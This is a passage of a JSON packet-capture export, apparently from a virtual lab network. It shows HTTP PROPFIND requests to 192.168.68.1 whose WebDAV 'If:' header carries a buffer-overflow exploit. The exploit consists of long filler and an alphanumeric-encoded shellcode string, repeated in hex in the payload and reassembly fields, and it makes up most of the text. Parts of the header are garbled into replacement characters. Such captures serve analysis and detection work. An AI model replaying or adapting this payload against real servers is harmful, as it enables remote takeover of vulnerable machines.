39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/rfIFJqZuyuwJcMmAOtaCZZIXpONlYiFVjXIvEeZiOvRExVabllgIgiRZlwodByCQSXzqyzO<7A><4F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/hjpKQKsOHXpbGHUXBjNSQWltEJqvkCPNwgeHDzLtJDUDCLsXexvSZaeeuHWPoYlpowGhNEE<45><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "528"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.884989000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.884989000",
|
||
"frame.time_delta": "0.000055000",
|
||
"frame.time_delta_displayed": "0.003522000",
|
||
"frame.time_relative": "17.135929000",
|
||
"frame.number": "536",
|
||
"frame.len": "269",
|
||
"frame.cap_len": "269",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "255",
|
||
"ip.id": "0x0000da19",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00005678",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "39383",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "39383",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "76",
|
||
"tcp.len": "203",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "835350808",
|
||
"tcp.nxtseq": "1652",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2336870234",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00007d8f",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:94:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:94:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868692",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000370000",
|
||
"tcp.analysis.bytes_in_flight": "1651",
|
||
"tcp.analysis.push_bytes_sent": "1651"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000687000",
|
||
"tcp.time_delta": "0.000055000"
|
||
},
|
||
"tcp.payload": "71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "535",
|
||
"tcp.segment": "536",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1651",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:59:70:79:71:62:43:56:56:4b:79:56:73:76:67:50:74:61:74:43:53:46:65:59:64:62:5a:4c:70:49:5a:56:7a:47:59:56:6f:6f:64:54:48:77:43:58:4b:4b:6e:44:51:6b:77:52:67:67:56:65:46:4f:43:76:77:62:69:66:6e:78:70:53:4c:46:67:e6:9d:90:e7:9d:a1:e5:81:83:e6:b1:83:e4:89:b4:e7:85:88:e6:ad:a6:e7:85:8d:e5:a1:ac:e4:ad:8a:e4:89:88:e4:b5:88:e6:89:8d:e5:99:8f:e5:9d:a2:e4:95:8b:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:89:a4:e7:99:8c:e7:9d:ac:e6:b1:8f:e4:8d:b8:e4:8d:b4:e6:9d:95:e7:91:b7:e5:9d:b7:e6:a5:97:e4:a5:ba:e7:99:96:e6:ad:ba:e5:9d:a1:e6:99:90:e7:85:86:e7:a9:8e:e4:ad:ac:e6:b5:b0:e4:a1:b9:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6d:5a:4c:55:6f:66:79:62:44:54:65:69:41:45:4f:45:48:49:6b:72:56:47:4a:4f:52:4d:4b:70:46:52:4e:6f:65:48:6f:5a:66:46:4f:62:5a:78:59:48:77:79:79:54:77:62:61:46:48:4c:73:5a:41:49:41:6e:4c:6a:67:50:56:7a:61:4f:48:6d:e6:8d:b1:e6:85:99:e4:a9:81:e4:85:82:e5:81:b7:e6:9d:a3:e7:a5:b9:e7:a9:b1:e4:85:98:e5:a5:a4:e5:a1:a1:e5:99:98:e4:b9:b7:e4:85:84:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:8d:ab:e7:9d:a3:e6:a5:b0:e4:91:94:e1:8f:80:e6:a0:83:e7:85:a2:e7:9d:94:e4:8d:94:e4:a5:ac:e7:a5:b0:e4:95:b3:e5:a5:97:e5:99:99:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/YpyqbCVVKyVsvgPtatCSFeYdbZLpIZVzGYVoodTHwCXKKnDQkwRggVeFOCvwbifnxpSLFg<46><67><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) 